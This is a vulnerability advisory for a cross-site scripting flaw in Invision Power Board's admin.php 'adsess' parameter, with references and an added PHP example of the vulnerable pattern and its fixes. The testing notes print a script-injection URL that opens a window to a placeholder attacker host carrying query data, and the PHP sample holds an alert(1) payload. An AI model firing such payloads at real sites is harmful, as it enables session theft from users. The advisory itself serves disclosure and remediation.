Invision Power Board admin.php adsess Variable XSS

2003-08-23T00:00:00
ID OSVDB:3353
Type osvdb
Reporter OSVDB
Modified 2003-08-23T00:00:00

Description

Vulnerability Description

Invision Power Board contains a flaw that allows a remote cross-site scripting attack. This flaw exists because the application does not validate the "adsess" variable when it is submitted to the admin.php script. This could allow a user to create a specially crafted URL that would execute arbitrary script code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

Solution Description

Currently, there are no known workarounds or upgrades to correct this issue. However, the vulnerability reporter has released a patch to address this vulnerability.

Short Description

Invision Power Board contains a flaw that allows a remote cross-site scripting attack. This flaw exists because the application does not validate the "adsess" variable when it is submitted to the admin.php script. This could allow a user to create a specially crafted URL that would execute arbitrary script code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

Manual Testing Notes

http://[target]/admin.php?adsess='><script>window.open (window.location.search.substring(78));</script><http://[attacker]?BoyBear$$$From$$$BinaryVision

http://[target]/2p1p0b3/upload/admin.php?adsess=[xss]&act=login&code=login-complete
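The bug class behind this entry, shown as an added PHP example that is not Invision Power Board code: a request parameter reflected into HTML without output encoding, beside two defensive fixes (contextual encoding and input validation). The parameter name "adsess" comes from the advisory; the hidden-input markup, the token format checked by valid_adsess(), and all function names are assumptions for illustration. The leading `'>` in the advisory's proof-of-concept indicates an attribute context, which is what the constructed markup reproduces.

```php
<?php
// Added example, not Invision Power Board's code. The form markup below is a
// constructed stand-in for whatever page admin.php actually emitted; only the
// parameter name "adsess" is taken from the advisory.

// Vulnerable pattern: the raw parameter lands inside a single-quoted attribute,
// so a value starting with '> closes the attribute and the tag, and whatever
// follows is parsed as markup.
function render_vulnerable(string $adsess): string {
    return "<input type='hidden' name='adsess' value='" . $adsess . "'>";
}

// Fix 1: contextual output encoding. ENT_QUOTES encodes both ' and ", so the
// value can never terminate the attribute regardless of its content.
function render_encoded(string $adsess): string {
    $safe = htmlspecialchars($adsess, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return "<input type='hidden' name='adsess' value='" . $safe . "'>";
}

// Fix 2 (defence in depth): validate the parameter against the shape a session
// token should have before it is used anywhere. The 32-hex-character format is
// an assumption; substitute the real token format.
function valid_adsess(string $adsess): bool {
    return preg_match('/\A[a-f0-9]{32}\z/', $adsess) === 1;
}

// Reject malformed tokens instead of reflecting them, then encode on output.
function render_hardened(?string $adsess): string {
    if ($adsess === null || !valid_adsess($adsess)) {
        return 'Invalid session token';
    }
    return render_encoded($adsess);
}

// Constructed sample values: the first has the shape of the advisory's
// proof-of-concept, the second is a well-formed token.
$samples = [
    "'><script>alert(1)</script><",
    str_repeat('ab', 16),
];
foreach ($samples as $s) {
    echo "vulnerable: " . render_vulnerable($s) . "\n";
    echo "encoded:    " . render_encoded($s) . "\n";
    echo "hardened:   " . render_hardened($s) . "\n\n";
}
```

Run with `php example.php`. The vulnerable line shows the injected `<script>` element emitted as live markup; the encoded line shows it rendered inert as `&#039;&gt;&lt;script&gt;...`; the hardened line shows the malformed token rejected outright while the well-formed one passes through. Encoding alone closes the XSS; the validation step additionally keeps attacker-controlled bytes out of logs and downstream code paths.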

References:

Vendor URL: http://www.invisionboard.com/
Other Solution URL: http://archives.neohapsis.com/archives/bugtraq/2003-08/0103.html
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2003-08/0087.html
ISS X-Force ID: 12860
Bugtraq ID: 8381